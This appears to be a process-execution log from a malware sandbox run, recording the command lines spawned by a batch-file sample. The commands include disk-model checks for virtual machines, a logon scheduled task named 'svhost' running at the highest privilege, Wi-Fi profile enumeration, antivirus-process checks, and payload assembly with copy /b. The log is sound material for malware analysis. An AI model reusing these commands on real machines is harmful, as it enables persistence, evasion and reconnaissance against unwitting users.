"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Desktop\Loli169.bat"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Wbem\WMIC.exe

wmic diskdrive get Model

C:\Windows\system32\findstr.exe

findstr /i "DADY HARDDISK QEMU HARDDISK WDC WDS100T2B0A"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\9YDL858ngq4B.bat"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\TuGrPuBdKTPZ.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Roaming\$77Security.exe

C:\Users\Admin\AppData\Roaming\$77Security.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\TuGrPuBdKTPZ.bat"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\IrF6CLU8JxbY.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\Desktop\Files\random.exe

"C:\Users\Admin\Desktop\Files\random.exe"

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Users\Admin\Desktop\Files\sam.exe

"C:\Users\Admin\Desktop\Files\sam.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\CbU7OfKCtes6.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\Desktop\Files\PowerRat.exe

"C:\Users\Admin\Desktop\Files\PowerRat.exe"

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\system32\DllHost.exe

"C:\Windows\system32\DllHost.exe" /Processid:{9F156763-7844-4DC4-B2B1-901F640F5155}

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iGrTS9ZFWksk.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\Desktop\Files\nobody.exe

"C:\Users\Admin\Desktop\Files\nobody.exe"

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Users\Admin\Desktop\Files\bnkrigkawd.exe

"C:\Users\Admin\Desktop\Files\bnkrigkawd.exe"

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\system32\findstr.exe

findstr /R /C:"[ ]:[ ]"

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\netsh.exe

netsh wlan show networks mode=bssid

C:\Windows\system32\findstr.exe

findstr "SSID BSSID Signal"

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Users\Admin\Desktop\Files\99awhy8l.exe

"C:\Users\Admin\Desktop\Files\99awhy8l.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c copy Impacts Impacts.bat & Impacts.bat

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AEnGm3FHatpx.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "wrsa opssvc"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"

C:\Windows\SysWOW64\cmd.exe

cmd /c md 578678

C:\Windows\SysWOW64\findstr.exe

findstr /V "PEACEFOLKSEXUALISLANDS" Hill

C:\Windows\SysWOW64\cmd.exe

cmd /c copy /b ..\Webpage + ..\Von + ..\Exotic + ..\Relief + ..\Seo + ..\Serious + ..\Myth y

C:\Users\Admin\AppData\Local\Temp\578678\Cooper.pif

Cooper.pif y

C:\Windows\SysWOW64\choice.exe

choice /d y /t 5

C:\Users\Admin\Desktop\Files\S%D0%B5tu%D1%80111.exe

"C:\Users\Admin\Desktop\Files\S%D0%B5tu%D1%80111.exe"

C:\Users\Admin\Desktop\Files\XM.exe

"C:\Users\Admin\Desktop\Files\XM.exe"

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Users\Admin\AppData\Roaming\$77Security.exe

C:\Users\Admin\AppData\Roaming\$77Security.exe

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\Desktop\Files\xxx.exe

"C:\Users\Admin\Desktop\Files\xxx.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\Desktop\Files\surfex.exe

"C:\Users\Admin\Desktop\Files\surfex.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZYRYbhs6JAqJ.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E6ADFD51-FF5F-4049-8192-CB91A1ADE0C3}\MicrosoftEdge_X64_133.0.3065.59_132.0.2957.140.exe

"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E6ADFD51-FF5F-4049-8192-CB91A1ADE0C3}\MicrosoftEdge_X64_133.0.3065.59_132.0.2957.140.exe" --msedgewebview --verbose-logging --do-not-launch-msedge --system-level

C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E6ADFD51-FF5F-4049-8192-CB91A1ADE0C3}\EDGEMITMP_16329.tmp\setup.exe

"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E6ADFD51-FF5F-4049-8192-CB91A1ADE0C3}\EDGEMITMP_16329.tmp\setup.exe" --install-archive="C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E6ADFD51-FF5F-4049-8192-CB91A1ADE0C3}\MicrosoftEdge_X64_133.0.3065.59_132.0.2957.140.exe" --previous-version="132.0.2957.140" --msedgewebview --verbose-logging --do-not-launch-msedge --system-level

C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E6ADFD51-FF5F-4049-8192-CB91A1ADE0C3}\EDGEMITMP_16329.tmp\setup.exe

"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E6ADFD51-FF5F-4049-8192-CB91A1ADE0C3}\EDGEMITMP_16329.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.60 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E6ADFD51-FF5F-4049-8192-CB91A1ADE0C3}\EDGEMITMP_16329.tmp\setup.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.59 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff6e0966a68,0x7ff6e0966a74,0x7ff6e0966a80

C:\Windows\System32\NOTEPAD.EXE

"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\Impacts.bat

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\8JmbWji5E3Yw.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\XSkv0xgggIX8.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ucuDPTnOk23r.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ucuDPTnOk23r.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Users\Admin\AppData\Local\Temp\temp_16571.exe

"C:\Users\Admin\AppData\Local\Temp\temp_16571.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KHOiRSC3GgYR.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Local\Temp\temp_16933.exe

"C:\Users\Admin\AppData\Local\Temp\temp_16933.exe"

C:\Users\Admin\AppData\Local\Temp\temp_16933.exe

"C:\Users\Admin\AppData\Local\Temp\temp_16933.exe"

C:\Users\Admin\AppData\Roaming\$77Security.exe

C:\Users\Admin\AppData\Roaming\$77Security.exe

C:\Users\Admin\AppData\Local\Temp\temp_16943.exe

"C:\Users\Admin\AppData\Local\Temp\temp_16943.exe"

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vFqv7AQ7aghj.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vFqv7AQ7aghj.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe

"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xOTUuNDMiIHNoZWxsX3ZlcnNpb249IjEuMy4xOTUuNDMiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7REU2RkFENEQtNjM2RS00RUEzLTgxMzAtOTFEQTc4Q0JBQjIxfSIgdXNlcmlkPSJ7MzVEMjA0RkQtMjdEOC00RTk2LUE3MDItN0VEMjE5NTJEMkQ2fSIgaW5zdGFsbHNvdXJjZT0ic2NoZWR1bGVyIiByZXF1ZXN0aWQ9InswNUE2RUE2NS0xMzI2LTRBN0YtOUFFNS1BNjBBMzMzNUU5OEZ9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iOCIgcGh5c21lbW9yeT0iOCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjIyMDAwLjQ5MyIgc3A9IiIgYXJjaD0ieDY0IiBwcm9kdWN0X3R5cGU9IjQ4IiBpc193aXA9IjAiIGlzX2luX2xvY2tkb3duX21vZGU9IjAiLz48b2VtIHByb2R1Y3RfbWFudWZhY3R1cmVyPSIiIHByb2R1Y3RfbmFtZT0iIi8-PGV4cCBldGFnPSImcXVvdDtWUFFvUDFGK2ZxMTV3UnpoMWtQTDRQTXBXaDhPUk1CNWl6dnJPQy9jaGpRPSZxdW90OyIvPjxhcHAgYXBwaWQ9IntGM0M0RkUwMC1FRkQ1LTQwM0ItOTU2OS0zOThBMjBGMUJBNEF9IiB2ZXJzaW9uPSIxLjMuMTk1LjQzIiBuZXh0dmVyc2lvbj0iIiBsYW5nPSIiIGJyYW5kPSJJTkJYIiBjbGllbnQ9IiIgaW5zdGFsbGFnZT0iMSIgY29ob3J0PSJycmZAMC4xOSI-PHVwZGF0ZWNoZWNrLz48cGluZyByPSIyIiByZD0iNjYxNiIgcGluZ19mcmVzaG5lc3M9IntCQzlGQTYwRC02RjQ5LTQzNkUtOEZDNS1CRkFBM0U4NTg1RjF9Ii8-PC9hcHA-PGFwcCBhcHBpZD0iezU2RUIxOEY4LUIwMDgtNENCRC1CNkQyLThDOTdGRTdFOTA2Mn0iIHZlcnNpb249IjkwLjAuODE4LjY2IiBuZXh0dmVyc2lvbj0iMTMzLjAuMzA2NS41OSIgbGFuZz0iIiBicmFuZD0iSU5CWCIgY2xpZW50PSIiIGV4cGVyaW1lbnRzPSJjb25zZW50PWZhbHNlIiBpbnN0YWxsYWdlPSIxIiBpc19waW5uZWRfc3lzdGVtPSJ0cnVlIiBsYXN0X2xhdW5jaF9jb3VudD0iMSIgbGFzdF9sYXVuY2hfdGltZT0iMTMzODM3NzAzMTc3NjAzMzQwIj48dXBkYXRlY2hlY2svPjxldmVudCBldmVudHR5cGU9IjEyIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI1MzI1MjcyNDM2IiBkb25lX2JlZm9yZV9vb2JlX2NvbXBsZXRlPSIwIi8-PGV2ZW50IGV2ZW50dHlwZT0iMTMiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIHN5c3RlbV91cHRpbWVfdGlja3M9IjUzMjUzMTI0ODQiIGRvbmVfYmVmb3JlX29vYmVfY29tcGxldGU9IjAiLz48ZXZlbnQgZXZlbnR0eXBlPSIxNCIgZXZlbnRyZXN1bHQ9IjAiIGVycm9yY29kZT0iLTIxNDcwMjM4MzgiIGV4dHJhY29kZTE9IjAiIHN5c3RlbV91cHRpbWVfdGlja3M9IjcwMzgxMjMxNjYiIHNvdXJjZV91cmxfaW5kZXg9IjAiIGRvbmVfYmVmb3JlX29vYmVfY29tcGxldGU9IjAiIGRvd25sb2FkZXI9ImRvIiB1cmw9Imh0dHA6Ly9tc2VkZ2UuYi50bHUuZGwuZGVsaXZlcnkubXAubWljcm9zb2Z0LmNvbS9maWxlc3RyZWFtaW5nc2VydmljZS9maWxlcy9mZWQ1NTgwNS0yZTg1LTQxZDgtYjRlMy00ZWY2YjVlYmY2M2E_UDE9MTc0MDAyNTUzOSZhbXA7UDI9NDA0JmFtcDtQMz0yJmFtcDtQND1JQm1TYVRrR1RPOGo1cHQzbjR6SDU2ejNEdTNVRFpVSU91SXhORDMySzUxazZzciUyZmglMmJYV25RNW01anM4RDRiNTRoVENYSHJkcDBjVE9uS0NobSUyYjBKUSUzZCUzZCIgc2VydmVyX2lwX2hpbnQ9IiIgY2RuX2NpZD0iLTEiIGNkbl9jY2M9IiIgY2RuX21zZWRnZV9yZWY9IiIgY2RuX2F6dXJlX3JlZl9vcmlnaW5fc2hpZWxkPSIiIGNkbl9jYWNoZT0iIiBjZG5fcDNwPSIiIGRvd25sb2FkZWQ9IjAiIHRvdGFsPSIwIiBkb3dubG9hZF90aW1lX21zPSI0Ii8-PGV2ZW50IGV2ZW50dHlwZT0iMTQiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIHN5c3RlbV91cHRpbWVfdGlja3M9IjcwMzgyNzkzODgiIHNvdXJjZV91cmxfaW5kZXg9IjAiIGRvbmVfYmVmb3JlX29vYmVfY29tcGxldGU9IjAiIGRvd25sb2FkZXI9ImJpdHMiIHVybD0iaHR0cDovL21zZWRnZS5iLnRsdS5kbC5kZWxpdmVyeS5tcC5taWNyb3NvZnQuY29tL2ZpbGVzdHJlYW1pbmdzZXJ2aWNlL2ZpbGVzL2ZlZDU1ODA1LTJlODUtNDFkOC1iNGUzLTRlZjZiNWViZjYzYT9QMT0xNzQwMDI1NTM5JmFtcDtQMj00MDQmYW1wO1AzPTImYW1wO1A0PUlCbVNhVGtHVE84ajVwdDNuNHpINTZ6M0R1M1VEWlVJT3VJeE5EMzJLNTFrNnNyJTJmaCUyYlhXblE1bTVqczhENGI1NGhUQ1hIcmRwMGNUT25LQ2htJTJiMEpRJTNkJTNkIiBzZXJ2ZXJfaXBfaGludD0iIiBjZG5fY2lkPSItMSIgY2RuX2NjYz0iIiBjZG5fbXNlZGdlX3JlZj0iIiBjZG5fYXp1cmVfcmVmX29yaWdpbl9zaGllbGQ9IiIgY2RuX2NhY2hlPSIiIGNkbl9wM3A9IiIgZG93bmxvYWRlZD0iMTc4NjA0MDg4IiB0b3RhbD0iMTc4NjA0MDg4IiBkb3dubG9hZF90aW1lX21zPSIxNjQ2NzQiLz48ZXZlbnQgZXZlbnR0eXBlPSIxNCIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgc3lzdGVtX3VwdGltZV90aWNrcz0iNzAzODI3OTM4OCIgc291cmNlX3VybF9pbmRleD0iMCIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIvPjxldmVudCBldmVudHR5cGU9IjE1IiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI3MDUzNjY3MzE4IiBkb25lX2JlZm9yZV9vb2JlX2NvbXBsZXRlPSIwIi8-PGV2ZW50IGV2ZW50dHlwZT0iMyIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMTk2NzU3IiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI3Njk3NjA5MzczIiBzb3VyY2VfdXJsX2luZGV4PSIwIiBkb25lX2JlZm9yZV9vb2JlX2NvbXBsZXRlPSIwIiB1cGRhdGVfY2hlY2tfdGltZV9tcz0iOTI4IiBkb3dubG9hZF90aW1lX21zPSIxNzEyODgiIGRvd25sb2FkZWQ9IjE3ODYwNDA4OCIgdG90YWw9IjE3ODYwNDA4OCIgcGFja2FnZV9jYWNoZV9yZXN1bHQ9IjAiIGluc3RhbGxfdGltZV9tcz0iNjQzOTQiLz48cGluZyBhY3RpdmU9IjEiIGE9IjIiIHI9IjIiIGFkPSI2NjE2IiByZD0iNjYxNiIgcGluZ19mcmVzaG5lc3M9IntEOTk4OTNFMC0wMkY5LTQ3MDktQUUwNi1CN0QwMzE0OTM4ODd9Ii8-PC9hcHA-PGFwcCBhcHBpZD0ie0YzMDE3MjI2LUZFMkEtNDI5NS04QkRGLTAwQzNBOUE3RTRDNX0iIHZlcnNpb249IjEzMi4wLjI5NTcuMTQwIiBuZXh0dmVyc2lvbj0iMTMzLjAuMzA2NS41OSIgbGFuZz0iIiBicmFuZD0iSU5CWCIgY2xpZW50PSIiIGluc3RhbGxhZ2U9IjEiIGNvaG9ydD0icnJmQDAuMjMiIHVwZGF0ZV9jb3VudD0iMSI-PHVwZGF0ZWNoZWNrLz48ZXZlbnQgZXZlbnR0eXBlPSIxMiIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgc3lzdGVtX3VwdGltZV90aWNrcz0iNTMyNTMxMjQ4NCIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIvPjxldmVudCBldmVudHR5cGU9IjEzIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI3Njk3NzY2MjAzIiBkb25lX2JlZm9yZV9vb2JlX2NvbXBsZXRlPSIwIi8-PGV2ZW50IGV2ZW50dHlwZT0iMTQiIGV2ZW50cmVzdWx0PSIwIiBlcnJvcmNvZGU9Ii0yMTQ3MDIzODM4IiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSIxMjI4MTIxNTYxNCIgc291cmNlX3VybF9pbmRleD0iMCIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIgZG93bmxvYWRlcj0iZG8iIHVybD0iaHR0cDovL21zZWRnZS5iLnRsdS5kbC5kZWxpdmVyeS5tcC5taWNyb3NvZnQuY29tL2ZpbGVzdHJlYW1pbmdzZXJ2aWNlL2ZpbGVzL2E0NzJlY2VjLWFlNjktNDQ5ZS1iN2EyLTRlODZkZmVlNThhOT9QMT0xNzQwMDI1NTQwJmFtcDtQMj00MDQmYW1wO1AzPTImYW1wO1A0PUpldCUyYmpnQXRucG1pWmklMmJZYXpWUVRNVEZ5SmxjRVdjbWl5Rnp3N0dpT1QxSEJ6VzhOcTB4SCUyZmtpbU1hdXAyUjM4OEhqUndyNUI1ampXSlVXWGE1a3lRJTNkJTNkIiBzZXJ2ZXJfaXBfaGludD0iIiBjZG5fY2lkPSItMSIgY2RuX2NjYz0iIiBjZG5fbXNlZGdlX3JlZj0iIiBjZG5fYXp1cmVfcmVmX29yaWdpbl9zaGllbGQ9IiIgY2RuX2NhY2hlPSIiIGNkbl9wM3A9IiIgZG93bmxvYWRlZD0iMCIgdG90YWw9IjAiIGRvd25sb2FkX3RpbWVfbXM9IjE2Ii8-PGV2ZW50IGV2ZW50dHlwZT0iMTQiIGV2ZW50cmVzdWx0PSIwIiBlcnJvcmNvZGU9Ii0yMTQ3MDEyODk0IiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3R